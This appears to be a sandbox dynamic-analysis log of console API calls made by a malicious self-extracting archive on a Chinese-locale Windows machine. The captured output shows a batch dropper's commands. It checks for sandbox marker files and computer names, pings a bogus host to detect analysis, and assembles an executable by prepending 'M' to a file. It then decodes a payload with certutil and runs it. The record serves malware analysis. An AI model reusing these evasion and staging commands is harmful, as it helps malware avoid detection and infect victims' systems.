| Time & API |
Arguments |
Status |
Return |
Repeated |
1619692366.889625
WriteConsoleW
|
buffer:
jjdXX
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692368.889625
WriteConsoleW
|
buffer:
Microsoft Windows [版本 6.1.7601]
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692368.889625
WriteConsoleW
|
buffer:
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692368.889625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692368.889625
WriteConsoleW
|
buffer:
Set fokOhApsw=Q
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692368.904625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692368.904625
WriteConsoleW
|
buffer:
if exist C:\aaa_TouchMeNot_.txt exit
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692368.904625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692368.904625
WriteConsoleW
|
buffer:
if %computername% == DESKTOP-%fokOhApsw%O5%fokOhApsw%U33 exit
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692368.920625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692368.920625
WriteConsoleW
|
buffer:
ping -n 1 Qojli.cCMlh
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692372.467625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692372.467625
WriteConsoleW
|
buffer:
if %errorlevel% == 0 exit
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692372.467625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692372.482625
WriteConsoleW
|
buffer:
if %computername% == NfZtFbPfH exit
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692372.482625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692372.498625
WriteConsoleW
|
buffer:
if %computername% == ELICZ exit
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692372.498625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692372.498625
WriteConsoleW
|
buffer:
if %computername% == MAIN exit
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692372.514625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692372.514625
WriteConsoleW
|
buffer:
<nul set /p ="M" > lsm.com
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692372.545625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692372.545625
WriteConsoleW
|
buffer:
type lZaAeJGTxYLdiJNWVh.com >> lsm.com
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692373.639625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692373.639625
WriteConsoleW
|
buffer:
del lZaAeJGTxYLdiJNWVh.com
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692373.670625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692373.670625
WriteConsoleW
|
buffer:
certutil -decode trWqjuDVREmm.com j
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692377.686625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692377.686625
WriteConsoleW
|
buffer:
lsm.com j
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692377.842625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692377.842625
WriteConsoleW
|
buffer:
ping 127.0.0.1 -n 30
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692408.936625
WriteConsoleW
|
buffer:
C:\Users\ADMINI~1.OSK\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692371.529625
WriteConsoleA
|
buffer:
Ping ÇëÇóÕÒ²»µ½Ö÷»ú Qojli.cCMlh¡£Çë¼ì²é¸ÃÃû³Æ£¬È»ºóÖØÊÔ¡£
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692374.312
WriteConsoleW
|
buffer:
输入长度 = 980536
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692374.343
WriteConsoleW
|
buffer:
输出长度 = 713075
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692374.358
WriteConsoleW
|
buffer:
CertUtil: -decode 命令成功完成。
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692378.3735
WriteConsoleA
|
buffer:
ÕýÔÚ Ping 127.0.0.1
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692378.3895
WriteConsoleA
|
buffer:
¾ßÓÐ 32 ×Ö½ÚµÄÊý¾Ý:
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692378.4045
WriteConsoleA
|
buffer:
À´×Ô 127.0.0.1 µÄ»Ø¸´:
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692378.4045
WriteConsoleA
|
buffer:
×Ö½Ú=32
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692378.4045
WriteConsoleA
|
buffer:
ʱ¼ä<1ms
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692378.4045
WriteConsoleA
|
buffer:
TTL=128
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692379.4365
WriteConsoleA
|
buffer:
À´×Ô 127.0.0.1 µÄ»Ø¸´:
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692379.4365
WriteConsoleA
|
buffer:
×Ö½Ú=32
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692379.4365
WriteConsoleA
|
buffer:
ʱ¼ä<1ms
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692379.4515
WriteConsoleA
|
buffer:
TTL=128
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692380.4515
WriteConsoleA
|
buffer:
À´×Ô 127.0.0.1 µÄ»Ø¸´:
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692380.4515
WriteConsoleA
|
buffer:
×Ö½Ú=32
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692380.4515
WriteConsoleA
|
buffer:
ʱ¼ä<1ms
console_handle:
0x00000007
|
success
|
1 |
0
|
1619692380.4515
WriteConsoleA
|
buffer:
TTL=128
console_handle:
0x00000007
|
success
|
1 |
0
|